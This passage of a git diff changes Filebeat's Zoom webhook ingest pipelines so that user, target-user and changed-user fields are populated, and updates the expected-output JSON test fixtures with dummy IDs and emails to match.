b/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml index 95c95cba215e..4c114b5e08c9 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml @@ -43,7 +43,18 @@ processors: - append: field: related.user value: "{{zoom.operator_id}}" - if: "ctx?.zoom?.operator_id != null" + if: "ctx.zoom?.operator_id != null" +# Set user.id from operator data (user who performs an action). +- set: + field: user.id + value: "{{zoom.operator_id}}" + if: "ctx.zoom?.operator_id != null" +# Set user.name from operator data only when user.id also set above. +- set: + field: user.email + value: "{{zoom.operator}}" + ignore_empty_value: true + if: "ctx.zoom?.operator_id != null" # Removing some fields that have complex nested arrays that might impact performance - remove: field: diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml b/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml index 9e5ba923b129..715f46bcbd93 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml @@ -46,13 +46,21 @@ processors: - UNIX_MS if: ctx?.event?.action == 'recording.renamed' ignore_failure: true +- remove: + field: zoom.recording.recording_file.recording_start + if: 'ctx.zoom?.recording?.recording_file?.recording_start == ""' +- remove: + field: zoom.recording.recording_file.recording_end + if: 'ctx.zoom?.recording?.recording_file?.recording_end == ""' - set: field: event.start value: '{{ zoom.recording.recording_file.recording_start }}' + ignore_empty_value: true if: ctx?.event?.action == 'recording.started' - set: field: event.end value: '{{ zoom.recording.recording_file.recording_end }}' + ignore_empty_value: true if: ctx?.event?.action == 'recording.stopped' - script: lang: painless @@ -74,12 +82,32 @@ processors: if: "ctx?.zoom?.recording?.host_id != null" - append: field: related.user - value: "{{zoom.recording.registrant.id}}" - if: "ctx?.zoom?.recording?.registrant?.id != null" + value: "{{zoom.registrant.id}}" + if: "ctx?.zoom?.registrant?.id != null" - remove: field: zoom.time_stamp ignore_missing: true if: ctx?.event?.action == 'recording.renamed' +- set: + field: 'user.email' + value: '{{zoom.registrant.email}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.full_name' + value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.id' + value: '{{zoom.registrant.id}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.id' + value: '{{zoom.recording.host_id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null' on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/user.yml b/x-pack/filebeat/module/zoom/webhook/ingest/user.yml index 2f7a82bfc758..bf5f4afea4f9 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/user.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/user.yml @@ -5,11 +5,11 @@ processors: value: configuration if: "['user.settings_updated'].contains(ctx?.event?.action)" - append: - field: event.type + field: event.category value: iam if: "!['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" - append: - field: event.type + field: event.category value: authentication if: "['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" - append: @@ -59,6 +59,129 @@ processors: - zoom.time_stamp - zoom.user.date_time ignore_missing: true + +# +# set user.* from operator. +# +- set: + field: user.id + value: '{{zoom.operator_id}}' + ignore_empty_value: true +- set: + field: user.email + value: '{{zoom.operator}}' + ignore_empty_value: true + +# +# set user.* from user object when there's no operator. +# +- set: + field: user.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' +- set: + field: user.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' +- set: + field: user.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null' + +# +# set user.target.* from old_values +# +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + ignore_empty_value: true +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.old_values.email}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.old_values.email}}' + ignore_empty_value: true +- set: + field: user.target.full_name + value: '{{zoom.old_values.first_name}} {{zoom.old_values.last_name}}' + if: 'ctx.zoom?.old_values?.first_name != null' + +# +# set user.target.* from user.* without overriding old_values. +# This is necessary because some fields doesn't exist in old_values. +# +- set: + field: user.target.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null' +- set: + field: user.target.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + if: '(ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null) && ctx.zoom?.user?.first_name != null' + override: false + +# +# set user.changes.* from user object when there's old_values +# +- set: + field: user.changes.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id' +- set: + field: user.changes.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email' +- set: + field: user.changes.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name)' + +# +# append to related.user +# +- append: + field: related.user + value: "{{zoom.user.id}}" + allow_duplicates: false + if: "ctx.zoom?.user?.id != null" +- append: + field: related.user + value: "{{zoom.old_values.id}}" + allow_duplicates: false + if: "ctx.zoom?.old_values?.id != null" + on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml b/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml index f136fab304e5..0cd605fbf162 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml @@ -68,14 +68,73 @@ processors: - ISO_INSTANT if: ctx?.event?.action == 'webinar.participant_left' ignore_failure: true + +# +# set user.* from participant +# +- set: + field: user.id + value: '{{zoom.participant.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.participant != null' +- set: + field: user.full_name + value: '{{zoom.participant.user_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.participant != null' + +# +# set user.* from registrant +# +- set: + field: user.id + value: '{{zoom.registrant.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' +- set: + field: user.email + value: '{{zoom.registrant.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' +- set: + field: user.full_name + value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' + +# +# set user.* from operator +# +- set: + field: user.id + value: '{{zoom.operator_id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' +- set: + field: user.email + value: '{{zoom.operator}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + +# +# append to related.user +# - append: field: related.user value: "{{zoom.webinar.host_id}}" - if: "ctx?.zoom?.webinar?.host_id != null" + allow_duplicates: false + if: "ctx.zoom?.webinar?.host_id != null" +- append: + field: related.user + value: "{{zoom.registrant.id}}" + allow_duplicates: false + if: "ctx.zoom?.registrant?.id != null" - append: field: related.user - value: "{{zoom.webinar.participant.user_id}}" - if: "ctx?.zoom?.webinar?.participant?.user_id != null" + value: "{{zoom.participant.id}}" + allow_duplicates: false + if: "ctx.zoom?.participant?.id != null" + on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml b/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml index 5c464b8ddd50..8a7370ed2463 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml @@ -16,10 +16,6 @@ processors: field: zoom.object target_field: zoom.zoomroom ignore_missing: true -- append: - field: related.user - value: "{{zoom.user.id}}" - if: "ctx?.zoom?.user?.id != null" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json index 34d5e7363e7e..cb63b4bead73 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json @@ -28,6 +28,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "youramazingemailhere@somemail.com", + "user.id": "uLohghhRgfgrbTayCX6r2Q_qQsQ", + "user.target.email": "thesubaccountowneremail@somemail.com", + "user.target.id": "e2ZHO5RSGqyfrmFnElxw", "zoom.account.owner_email": "thesubaccountowneremail@somemail.com", "zoom.account.owner_id": "e2ZHO5RSGqyfrmFnElxw", "zoom.master_account_id": "lq8KK_EoRCq6ByEyA73qCA", @@ -56,13 +60,21 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "iKoRgfbaTazDX6r2Q_eQsQL" + "iKoRgfbaTazDX6r2Q_eQsQL", + "eFs_EGRCq6ByEyA73qCA" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.changes.full_name": "Michael Harris", + "user.changes.name": "MH", + "user.email": "theoperatoremail@someemail.com", + "user.id": "iKoRgfbaTazDX6r2Q_eQsQL", + "user.target.full_name": "Mike Harris", + "user.target.id": "eFs_EGRCq6ByEyA73qCA", + "user.target.name": "", "zoom.account.account_alias": "MH", "zoom.account.account_name": "Michael Harris", "zoom.master_account_id": "abKKcd_IGRCq63yEy673lCA", @@ -102,6 +114,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "youremail@someemail.com", + "user.id": "gdjfdhjLsuhfvhjd", + "user.target.email": "theowneremail@someemail.com", + "user.target.id": "eZbcHO5RSGqyKAUmFnElxw", "zoom.account.owner_email": "theowneremail@someemail.com", "zoom.account.owner_id": "eZbcHO5RSGqyKAUmFnElxw", "zoom.master_account_id": "aBcd_dgfoeq6ByEyA73qCA", diff --git a/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json index 100d3fbeea94..97dfbf0338d0 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json @@ -25,6 +25,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", "zoom.account_id": "vbbvnvAdsfe", "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", "zoom.chat_channel.name": "Delivering Happiness", @@ -32,6 +34,72 @@ "zoom.operator": "somememai@gmtsffjdfhail.com", "zoom.operator_id": "z8dfgdfguQrdfgdf" }, + { + "event.action": "chat_channel.updated", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 403, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Building Happy", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, + { + "event.action": "chat_channel.deleted", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "deletion" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 683, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Building Happy", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, { "event.action": "chat_channel.member_invited", "event.dataset": "zoom.webhook", @@ -57,6 +125,74 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Delivering Happiness", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, + { + "event.action": "chat_channel.member_joined", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "user" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 1311, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Delivering Happiness", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, + { + "event.action": "chat_channel.member_left", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "user" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 1603, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", "zoom.account_id": "vbbvnvAdsfe", "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", "zoom.chat_channel.name": "Delivering Happiness", diff --git a/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json index 86cf03b64238..348ffc2bac6b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json @@ -24,6 +24,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", @@ -59,6 +61,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", @@ -94,6 +98,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", diff --git a/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json index 858f739d55a4..123de911c51b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json @@ -24,6 +24,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", "zoom.meeting.issues": "Unstable audio quality", @@ -52,7 +53,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -60,6 +60,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": 111111111, @@ -98,6 +100,8 @@ "forwarded" ], "url.full": "https://zoom.us/j/00000000", + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAAA", "zoom.meeting.id": 155184668, "zoom.meeting.start_time": "2019-07-11T20:00:00Z", @@ -133,7 +137,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "BBBBBBBBBB", "BBBBBBBBBB" ], "service.type": "zoom", @@ -141,6 +144,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAA", "zoom.meeting.host_id": "BBBBBBBBBB", "zoom.meeting.id": 809321987, @@ -178,6 +183,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -212,6 +218,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -248,6 +255,7 @@ "forwarded" ], "url.full": "https://zoom.us/w/someendpointhere", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -302,6 +310,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "somemail@email.com", + "user.id": "Lobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -342,6 +352,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -375,6 +386,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "s0AAAASoSE1V8KIFOCYw", "z8yCxTTTTSiw02QgCAp8uQ" ], "service.type": "zoom", @@ -382,6 +394,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", @@ -417,6 +431,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "s0AAAASoSE1V8KIFOCYw", "z8yCxTTTTSiw02QgCAp8uQ" ], "service.type": "zoom", @@ -424,6 +439,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", @@ -466,6 +483,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Shrijana Shrijana", + "user.id": "z8yCxjjyTAAAA2QgCfp8uQ", "zoom.account_id": "EPeQti9EQsiyO30GVYxHMA", "zoom.meeting.host_id": "z8yCxjjyTAAAA2QgCfp8uQ", "zoom.meeting.id": "5590000000", @@ -500,6 +519,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Tom Harry", + "user.id": "zf8yCxjjyTSdteriw02QgCfp8uQ", "zoom.account_id": "APeeQti9ErttQsiyO30GVYxHMA", "zoom.meeting.host_id": "zf8yCxjjyTSdteriw02QgCfp8uQ", "zoom.meeting.id": "5594913504", @@ -527,6 +548,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "iFxeBPYun6SAiWUzBcEkX", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -534,6 +556,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -564,6 +588,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "iFxeBPYun6SAiWUzBcEkX", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -571,6 +596,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", diff --git a/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json index c5ef97dac473..507943735b29 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json @@ -20,6 +20,7 @@ "cadsd32wA" ], "service.type": "zoom", + "source.user.id": "cadsd32wA", "tags": [ "zoom-webhook", "forwarded" @@ -56,6 +57,7 @@ "cajhdsf3wA" ], "service.type": "zoom", + "source.user.id": "cajhdsf3wA", "tags": [ "zoom-webhook", "forwarded" @@ -93,6 +95,7 @@ "z8yCxjgjsuyd58uQ" ], "service.type": "zoom", + "source.user.id": "z8yCxjgjsuyd58uQ", "tags": [ "zoom-webhook", "forwarded" @@ -108,6 +111,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T01:38:40Z" }, { + "destination.user.id": "z8yCDSSQWSSWuQ", "event.action": "phone.callee_answered", "event.dataset": "zoom.webhook", "event.kind": [ @@ -145,6 +149,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T01:41:56Z" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.callee_missed", "event.dataset": "zoom.webhook", "event.kind": [ @@ -178,6 +183,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.callee_ended", "event.dataset": "zoom.webhook", "event.duration": 4000000000, @@ -215,6 +221,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.caller_ended", "event.dataset": "zoom.webhook", "event.duration": 4000000000, @@ -252,6 +259,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "sfcg43FOCYw", "event.action": "phone.callee_rejected", "event.dataset": "zoom.webhook", "event.duration": 6000000000, @@ -288,6 +296,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T21:06:33Z" }, { + "destination.user.id": "543234", "event.action": "phone.voicemail_received", "event.dataset": "zoom.webhook", "event.kind": [ diff --git a/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json index f7a97693de5e..f9be7349ab4f 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json @@ -1,4 +1,116 @@ [ + { + "event.action": "recording.started", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.start": "2019-07-31T22:41:02Z", + "event.timezone": "-02:00", + "event.type": [ + "info", + "start" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 0, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:41:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, + { + "event.action": "recording.paused", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "info", + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 359, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:41:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, + { + "event.action": "recording.resumed", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "info", + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 717, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:45:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, { "event.action": "recording.stopped", "event.dataset": "zoom.webhook", @@ -25,6 +137,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 8, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -63,6 +176,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_email": "somemeail@someemailservice.fjdjf", @@ -101,6 +215,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "shrifdfdh@kjdmail.com", + "user.id": "zdhghgCfp8uQ", "zoom.account_id": "EPhgfhfghfYxHMA", "zoom.old_values.id": 7000000, "zoom.old_values.topic": "My Fancy Recording 